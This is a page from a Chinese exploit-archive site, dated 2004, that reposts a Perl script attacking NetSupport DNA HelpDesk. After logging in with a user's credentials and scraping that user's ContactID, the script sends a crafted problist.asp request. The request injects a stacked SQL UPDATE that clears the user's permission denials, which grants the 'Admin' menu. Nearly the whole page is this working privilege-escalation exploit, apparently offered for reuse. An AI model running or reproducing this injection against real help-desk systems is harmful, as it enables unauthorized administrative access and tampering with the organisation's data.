首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
NetSupport DNA HelpDesk SQL Injection Exploit
来源:vfocus.net 作者:vfcous 发布时间:2004-07-23  

NetSupport DNA HelpDesk SQL Injection Exploit


#!/usr/bin/perl

use IO::Socket;
use strict;

my $verbose = 0;

if (($#ARGV+1) < 4)
{
print "Usage (Provided only ".($#ARGV+1)." parameters):\n";
print "DNAHack.pl host path email password\n";
print "host - IP/name formed (e.g. 192.168.1.243)\n";
print "path - The path under which the product is installed (e.g.
/HelpDesk/)\n";
print "email - The email used to logon (e.g. example\@com.com)\n";
print "password - The password used for the email provided (e.g.
foobar)\n";
exit(0);
}

my $host = $ARGV[0];
my $path = $ARGV[1];

my $remote = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $host,
PeerPort => "80" );

unless ($remote) { die "cannot connect to http daemon on $host" }

if ($verbose)
{
print "connected\n";
}

$remote->autoflush(1);

my $Email = $ARGV[2];
my $Password = $ARGV[3];

print "Grabbing initial cookie\n";

my $http = "GET /$path/logon.asp HTTP/1.1
Host: $host
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.6) Gecko/20040405
Firefox/0.8
Accept:
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,video/x-mng,image/png,image/jpeg,ima
ge/gif;q=0.2,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Connection: close
Referer: http://$host/$path/logon.asp

";

print $remote $http;
if ($verbose)
{
print "HTTP: [".$http."]\n";
}

sleep(1);

my $Cookie = "";
while (<$remote>)
{
if (/Set-Cookie: ([^;]+;)/)
{
$Cookie .= $1." ";
}
if ($verbose)
{
print "$_";
}
}

print "Cookie: $Cookie\n";

close($remote);

my $remote = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $host,
PeerPort => "80" );

unless ($remote) { die "cannot connect to http daemon on $host" }

if ($verbose)
{
print "connected\n";
}

$remote->autoflush(1);

print "Performing logon\n";

$http = "POST /$path/logon.asp HTTP/1.1
Host: $host
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.6) Gecko/20040405
Firefox/0.8
Accept:
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,video/x-mng,image/png,image/jpeg,image/gif;q=0.2,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Cookie: $Cookie
Connection: close
Referer: http://$host/$path/logon.asp
Content-Type: application/x-www-form-urlencoded
Content-Length: ";

my $content =
"EmailAddress=$Email&password=$Password&action=submit&submitBtn=Logon&Redirect=";

$http .= length($content) ."\r\n";

$http .= "\r\n$content";

print $remote $http;
if ($verbose)
{
print "HTTP: [".$http."]\n";
}

sleep(1);

while (<$remote>)
{
if (/Set-Cookie: ([^;]+;)/)
{
$Cookie .= $1." ";
}

if ($verbose)
{
print "$_";
}
}

close($remote);

print "Cookie: $Cookie\n";

print "Grabbing ContactID\n";

$remote = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $host,
PeerPort => "80" );
unless ($remote) { die "cannot connect to http daemon on $host" }

if ($verbose)
{
print "connected\n";
}

$remote->autoflush(1);

$http = "GET /helpdesk/createContact.asp?editself=1 HTTP/1.1
Host: $host
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.6) Gecko/20040405
Firefox/0.8
Accept:
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,video/x-mng,image/png,image/jpeg,image/gif;q=0.2,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Connection: close
Cookie: $Cookie

";

my $ContactID;

print $remote $http;

sleep(1);

while (<$remote>)
{
if (/<input type="hidden" id="ContactID" name="ContactID"
value="([0-9]+)">/)
{
$ContactID = $1;
}
if ($verbose)
{
print "$_";
}
}

close $remote;

print "ContactID: $ContactID\n";

print "Gaining elvated privileges\n";

$remote = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $host,
PeerPort => "80" );
unless ($remote) { die "cannot connect to http daemon on $host" }
if ($verbose)
{
print "connected\n";
}
$remote->autoflush(1);

$http = "GET
/$path/problist.asp?where=1%3D0+order+by+TicketId;+UPDATE+HD_Permissions+SET+denyPermission=0+WHERE+ContactId=$ContactID+-- HTTP/1.1
Host: $host
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.6) Gecko/20040405
Firefox/0.8
Accept:
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,video/x-mng,image/png,image/jpeg,image/gif;q=0.2,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Connection: close
Cookie: $Cookie

";

print "Gaining privileges\n";
print $remote $http;
sleep(1);

while (<$remote>)
{
if ($verbose)
{
print "$_";
}
}
print "\n";

close $remote;

print "Logon to the system as before, you should be able to view the
'Admin' menu\n";
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Polar HelpDesk Remote Exploit
·Mensajeitor Exploit
·Internet Software Sciences's S
·Denial of Service in Microsoft
·LBE Web HelpDesk SQL Injection
·ms04-022 exp for xp sp1
·Multiple Serena TeamTrack Expl
·Lexmark Network Printers Built
·Drcatd Multiple Buffer Overflo
·JSP的WEBSHELL
·Samba SWAT Authorization Buffe
·WinXP Task Scheduler (.job) Un
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved